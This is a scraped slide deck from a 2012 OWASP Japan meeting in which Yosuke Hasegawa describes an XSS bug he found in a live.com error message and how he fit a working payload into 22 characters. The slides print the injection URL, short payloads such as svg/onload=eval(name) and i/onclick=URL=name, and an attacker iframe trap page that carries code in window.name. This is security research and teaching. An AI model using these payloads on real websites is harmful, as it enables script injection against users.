Upload
elmer-pun
View
218
Download
2
Embed Size (px)
Citation preview
OWASP Japan 2nd local chapter meeting
Short talk of XSS
Jun 27 2012Yosuke HASEGAWA
短い XSS の話
One dayある日
As alwayssurfed websites,
いつものように Web を眺めてると…
Just the usualXSS was found.
いつものように XSS が見つかった。
First of all,view-source:
とりあえず HTML ソース
What!?
なにこれ !?
<!-- Version: "13.000.20177.00" Server: BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 --><input type="hidden" value="MESSAGE: A potentially dangerous Request.QueryString value was detected from the client (param="><h1>XSSed</h1><!--").SOURCE: System.Web FORM:" />
https://*.live.com/?param=><h1>XSSed</h1><!--
XSS caused by error message
不要なエラーメッセージが引き起こした XSS
Microsoft “live.com”Over httpsNeedless error message
Interesting but not really matter now
興味深いけれど今はどうでもいい
Why not “alert” ?なんで alert じゃないの ?
alert is common knowledge for XSSers
alert は僕らの常識
Reason
理由
<!-- Version: "13.000.20177.00" Server: BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 --><input type="hidden" value="MESSAGE: A potentially dangerous Request.QueryString value was detected from the client (param="><h1>XSSed</h1><!--").SOURCE: System.Web FORM:" />
https://*.live.com/?param=><h1>XSSed</h1><!--
22 letters max.最大 22 文字
><h1>XSSed</h1><!--
><h1>XSSed</h1><!-- … 19 letters
XSS under 22 letters is too hard
22 文字以下で XSS させるのは難しい
><script>alert(1)</script> … 26 letters ><script>eval(name)</script> … 28 letters
XSS で任意のコードを動かすには何文字必要 ?
by Gareth Heyes
by Gareth HeyesXSS Golf
Shortest XSS Challanges
<x/x=&{eval(name)}; // @0x6D6172696F Netscape 4
<svg/onload=eval(name) // @0x6D6172696F
19 letters
22 letters
Go back to the XSS
話を例の XSS に戻して
<!-- Version: "13.000.20177.00" Server: BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 --><input type="hidden" value="MESSAGE: A potentially dangerous Request.QueryString value was detected from the client (param="><h1>XSSed</h1><!--").SOURCE: System.Web FORM:" />
https://*.live.com/?param=><h1>XSSed</h1><!--
22 letters max.最大 22 文字
><h1>XSSed</h1><!--
Impossible? No!
不可能?そんなことはない!
IE has “URL” property
IE は "URL" プロパティを持っている
><i/onclick=URL=name> … 21 letters
// Trap page created by attacker<iframe src="target" name="javascript:alert(1)">// or use window.open from JavaScript
Mario Heiderich’s work
Did it!
できた !!XSS Filter is disabled
Variations
22 文字あれば任意のコードが実行可能
<input type=hidden value=><i/onclick=URL=name>
<input type=text value= onclick=URL=name>
<input type=hidden value=""><i/onclick=URL=name>">
20 letters
22 letters
17 letters
Run arbitrary code in 22 letters
Shortest JavaScript
10 letters eval(name)
to run arbitrary code
9 letters eval(URL)
8 letters URL=name
6 letters $(URL)
任意コードを実行する最小の JavaScript
NetAgent http://www.netagent.co.jp/OWASP Japan 2nd local chapter meeting
Question?
[email protected]@netagent.co.jp
@hasegawayosuke
http://utf-8.jp/